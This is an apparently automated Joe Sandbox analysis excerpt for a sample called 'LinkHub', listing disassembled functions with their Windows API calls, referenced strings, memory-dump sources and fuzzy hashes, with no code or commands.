Opcode Fuzzy Hash: 3e66a2bef2db77413829e0ff563c4960caa0a4f053b54158eb19e29d98b46360
Instruction Fuzzy Hash: 61518D71104340AFDB04EF14CC6AFAABBE4FB98710F000AADF595972E1DB759904CB52

Function 00B7CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B7CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B7CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B7CD0F
GetLastError.KERNEL32 ref: 00B7CD67
SetEvent.KERNEL32(?), ref: 00B7CD7B
InternetCloseHandle.WININET(00000000), ref: 00B7CD86

Strings

, xrefs: 00B7CD00

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: a371bc15c50a31d6398f292252ff7bdccf83f57a47476161cfe91f5f821b3a2b
Instruction ID: 811923b4a565b720fca9e93227f1f789a42b7e41bdbc829724c29683196a21ea
Opcode Fuzzy Hash: a371bc15c50a31d6398f292252ff7bdccf83f57a47476161cfe91f5f821b3a2b
Instruction Fuzzy Hash: 44314DB1500604AFD731AF659D88AAB7FFCEB45740B1085AEF45AA7201DB34ED049B61

Function 00B6A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B455AE,?,?,Bad directive syntax error,00B9DCD0,00000000,00000010,?,?), ref: 00B6A236
LoadStringW.USER32(00000000,?,00B455AE,?), ref: 00B6A23D

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B6A301

Strings

., xrefs: 00B6A2E7
Error: , xrefs: 00B6A2CF
%s (%d) : ==> %s.: %s %s, xrefs: 00B6A26B
Line %d:, xrefs: 00B6A28C
Line %d (File "%s"):, xrefs: 00B6A2A7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 33ed3c661ea7ace97b71fe3fa632d0912c3e51c609a1bbb447606375ef2937e7
Instruction ID: 3f4305ae902c5415fec34a63a32a3e1416cfbba2a39b959d54495003ffe829f7
Opcode Fuzzy Hash: 33ed3c661ea7ace97b71fe3fa632d0912c3e51c609a1bbb447606375ef2937e7
Instruction Fuzzy Hash: 8521823284021EEFCF05AFA0CC46EEE7BB9BF18700F0044A9F515660A2EB759618EF51

Function 00B629EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B629F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00B62A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B62A9A

Strings

details, xrefs: 00B62A48
largeicons, xrefs: 00B62A2E
list, xrefs: 00B62A7C
SHELLDLL_DefView, xrefs: 00B62A19
smallicons, xrefs: 00B62A62

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 11b161aa0144d60a3bea1a39f56fd442b2aea419bfb292c7a6dde9626594c366
Instruction ID: 74cf49c736f9c13ca7d4d789d4c5c1d54995971a984a728dafd7bd541c4645a6
Opcode Fuzzy Hash: 11b161aa0144d60a3bea1a39f56fd442b2aea419bfb292c7a6dde9626594c366
Instruction Fuzzy Hash: 5C112577788B07BAFA246761EC07EA677DCCF14764B2000A6FA08E50E1FFE9AC014514

Function 00B07567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00B0758D
GetWindowRect.USER32(?,?), ref: 00B075CE
ScreenToClient.USER32(?,?), ref: 00B075F6
GetClientRect.USER32(?,?), ref: 00B0773A
GetWindowRect.USER32(?,?), ref: 00B0775B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: d80a950f6764caf69edf3cc530e35809bf3cacfbd8586641158ccc7d2146fb52
Instruction ID: 57778abe870f2fe7a72cb7052012e90518249413b17ff3e6d2ff7efbf9682bd8
Opcode Fuzzy Hash: d80a950f6764caf69edf3cc530e35809bf3cacfbd8586641158ccc7d2146fb52
Instruction Fuzzy Hash: F9C15C7990464AEFDB10CFA8C580BEDFBF1FF18310F14845AE896A3250DB35AA51DB61

Function 00B3D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B3D237
_free.LIBCMT ref: 00B3D2A2
_free.LIBCMT ref: 00B3D2C8
_free.LIBCMT ref: 00B3D2F1
_free.LIBCMT ref: 00B3D329
_free.LIBCMT ref: 00B3D35A
_free.LIBCMT ref: 00B3D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00B3D41C
_free.LIBCMT ref: 00B3D435

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: a33a0b362a1f48552f0abc593b892ef7647a9a39d5524a7bc3bf1f5fe32fb9fa
Instruction ID: adbe766e8f28b961924a163a5bf14d4ee00f72dbc84abc5ee8f8b3c36fd08060
Opcode Fuzzy Hash: a33a0b362a1f48552f0abc593b892ef7647a9a39d5524a7bc3bf1f5fe32fb9fa
Instruction Fuzzy Hash: A661B671905305AFDB25AF78FC91BAABBE4EF05320F3445FEE945A7282EB319D008651

Function 00B95B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00B95C24
ShowWindow.USER32(?,00000000), ref: 00B95C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00B95C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00B95C6F

Part of subcall function 00B979F2: DeleteObject.GDI32(00000000), ref: 00B97A1E

GetWindowLongW.USER32(?,000000F0), ref: 00B95CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B95CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B95CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00B95D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00B95D34

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: a3d5532bf853aeb8b25c956a89e6a6fdf0e1ae55c75ddd084128b923c1618fbe
Instruction ID: 7105a0eb6d2daf899651c654c48730f5ae02a7b8ac941c5bfb1a4393fe8a3c8e
Opcode Fuzzy Hash: a3d5532bf853aeb8b25c956a89e6a6fdf0e1ae55c75ddd084128b923c1618fbe
Instruction Fuzzy Hash: 53519130680A09BFEF369F68CC49F983BE5EF05750F2481B6F9149A1E1CB75A980DB40

Function 00B013A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00B428D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00B428EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B428FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00B42912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B42933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B42942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B4295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00B011F5,00000000,00000000,00000000,000000FF,00000000), ref: 00B4296E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 81253961bf5ccced7313ebf11a8fb1cecf84c5e0a3686bc0d344ea971278874f
Instruction ID: 80b987db71c8344aee464d173fbe127bc2f9650cf68731308263cedeed71ca9b
Opcode Fuzzy Hash: 81253961bf5ccced7313ebf11a8fb1cecf84c5e0a3686bc0d344ea971278874f
Instruction Fuzzy Hash: DD516830600209AFDB24CF29CC95BAA7BF5FF58710F504969F942972E0DB70E991EB50

Function 00B7CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B7CBC7
GetLastError.KERNEL32 ref: 00B7CBDA
SetEvent.KERNEL32(?), ref: 00B7CBEE

Part of subcall function 00B7CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B7CCB7
Part of subcall function 00B7CC98: GetLastError.KERNEL32 ref: 00B7CD67
Part of subcall function 00B7CC98: SetEvent.KERNEL32(?), ref: 00B7CD7B
Part of subcall function 00B7CC98: InternetCloseHandle.WININET(00000000), ref: 00B7CD86

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 82f2a2e689633e38853752b4c8fb22806e3ad6430231b3630e31e30884c1a9d2
Instruction ID: e551763b46ef36e9efc63a88144bc22fc7612bed22941d436feaae7fa38b01ae
Opcode Fuzzy Hash: 82f2a2e689633e38853752b4c8fb22806e3ad6430231b3630e31e30884c1a9d2
Instruction Fuzzy Hash: AA313C71500605BFDB229F75CE84A6ABFF8FF04300B14855EF96E97610DB35E814ABA0

Function 00B62EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B643AD
Part of subcall function 00B64393: GetCurrentThreadId.KERNEL32 ref: 00B643B4
Part of subcall function 00B64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B62F00), ref: 00B643BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B62F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B62F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B62F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B62F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B62F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B62F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B62F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B62F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B62F74

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 07b74f3d1ff96ca365f658f998dbe7e309d42398d9594ac863df560668c04105
Instruction ID: ba0a4772e5cb5c638d07e4def930ee0a2576dda545040ecaa51b28528c27122e
Opcode Fuzzy Hash: 07b74f3d1ff96ca365f658f998dbe7e309d42398d9594ac863df560668c04105
Instruction Fuzzy Hash: 9901D431784620BBFB1067699C8AF593F9ADB4DB11F100052F318AF1E0CDE264448AA9

Function 00B62150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B61D95,?,?,00000000), ref: 00B62159
HeapAlloc.KERNEL32(00000000,?,00B61D95,?,?,00000000), ref: 00B62160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B61D95,?,?,00000000), ref: 00B62175
GetCurrentProcess.KERNEL32(?,00000000,?,00B61D95,?,?,00000000), ref: 00B6217D
DuplicateHandle.KERNEL32(00000000,?,00B61D95,?,?,00000000), ref: 00B62180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B61D95,?,?,00000000), ref: 00B62190
GetCurrentProcess.KERNEL32(00B61D95,00000000,?,00B61D95,?,?,00000000), ref: 00B62198
DuplicateHandle.KERNEL32(00000000,?,00B61D95,?,?,00000000), ref: 00B6219B
CreateThread.KERNEL32(00000000,00000000,00B621C1,00000000,00000000,00000000), ref: 00B621B5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e87ac3a9401a623a2b055b64597f83750f29e2fc73eeffa03e8f453c57bb654a
Instruction ID: f44e6f0b46d3bfa722ea388919ae7e030e090500a734fe8f6ce90ecd1805b059
Opcode Fuzzy Hash: e87ac3a9401a623a2b055b64597f83750f29e2fc73eeffa03e8f453c57bb654a
Instruction Fuzzy Hash: 7701BFB6240304BFE710AF66DD4DF6B7BACEB89711F404412FA05DB1A1CA749800CB24

Function 00B8AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00B6DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00B6DDAC
Part of subcall function 00B6DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00B6DDBA
Part of subcall function 00B6DD87: CloseHandle.KERNELBASE(00000000), ref: 00B6DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B8ABCA
GetLastError.KERNEL32 ref: 00B8ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B8AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00B8ACC5
GetLastError.KERNEL32(00000000), ref: 00B8ACD0
CloseHandle.KERNEL32(00000000), ref: 00B8AD21

Strings

SeDebugPrivilege, xrefs: 00B8ABEC

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: eae1f3083ce075a85eabd1399f9eec39e110379c110e5716436f8ee7b566cd8f
Instruction ID: 01bff3da24590f3ef148f414fd9f8ebcc89151719b424757a6d3c2241c53e953
Opcode Fuzzy Hash: eae1f3083ce075a85eabd1399f9eec39e110379c110e5716436f8ee7b566cd8f
Instruction Fuzzy Hash: A3619E70208241AFE310EF19C995F26BBE1EF44308F5884DDE4668B7A2C775EC45CB92

Function 00B94322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B943C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B943D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B943F0
_wcslen.LIBCMT ref: 00B94435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00B94462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B94490

Strings

SysListView32, xrefs: 00B94393

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 62d2d56365fce29b582eee10e6a37819630fe70aed1193f7bfa69babc29fa887
Instruction ID: 448ec126534a261b4e2ebcbfca00a3ee490b2cd830fac0e91baa39849a8cce5f
Opcode Fuzzy Hash: 62d2d56365fce29b582eee10e6a37819630fe70aed1193f7bfa69babc29fa887
Instruction Fuzzy Hash: C441C031900318ABDF219F64CC49FEA7BE9EF08350F1005BAF948E7291DB759981DB90

Function 00B6C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B6C6C4
IsMenu.USER32(00000000), ref: 00B6C6E4
CreatePopupMenu.USER32 ref: 00B6C71A
GetMenuItemCount.USER32(014D54D0), ref: 00B6C76B
InsertMenuItemW.USER32(014D54D0,?,00000001,00000030), ref: 00B6C793

Strings

0, xrefs: 00B6C66F
2, xrefs: 00B6C6FE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 6a6713b78bcd534aa72fa1af943e8d64f7bf08575e50a9fd6c155d0d49c09bc1
Instruction ID: 251cb316c02556e03cca281ec5479744a972358d3b0713d8db0fcd2cda0e1c72
Opcode Fuzzy Hash: 6a6713b78bcd534aa72fa1af943e8d64f7bf08575e50a9fd6c155d0d49c09bc1
Instruction Fuzzy Hash: 4A51AC706012059BDF11CFA8C9C8ABEBFF4EF54314F2482AAE99597291D7789D40CF61

Function 00B6D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B6D1BE

Strings

info, xrefs: 00B6D15F
stop, xrefs: 00B6D18F
warning, xrefs: 00B6D1A7
blank, xrefs: 00B6D140
question, xrefs: 00B6D177

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 54ff8cb51eb48d55f403126c8ed9c3cb8d79360ea0dc87fbc192f71d16f16818
Instruction ID: d20b305ea0c895b9e5cc99ad5cdd4cf39a497b9c00e15fc62ee5597ae976e76c
Opcode Fuzzy Hash: 54ff8cb51eb48d55f403126c8ed9c3cb8d79360ea0dc87fbc192f71d16f16818
Instruction Fuzzy Hash: A611B735B8831ABAE7055F55EC82DAA77DCDF06760B2000EFF504B6291DBF85E414560

Function 00B6E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B6E759
gethostname.WSOCK32(?,00000100), ref: 00B6E773
gethostbyname.WSOCK32(?), ref: 00B6E780
inet_ntoa.WSOCK32(?), ref: 00B6E7C2
_strcat.LIBCMT ref: 00B6E7D0
WSACleanup.WSOCK32 ref: 00B6E7F5

Strings

0.0.0.0, xrefs: 00B6E79E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 9fd83b257b65dbd0b6fbb5d6a696971b0cb7f94cad37ce4504202bef82560f2b
Instruction ID: c667a5524e4fbcff2b2019aee9607fbf06da31288d621c3ffcd4fb326ca7bd24
Opcode Fuzzy Hash: 9fd83b257b65dbd0b6fbb5d6a696971b0cb7f94cad37ce4504202bef82560f2b
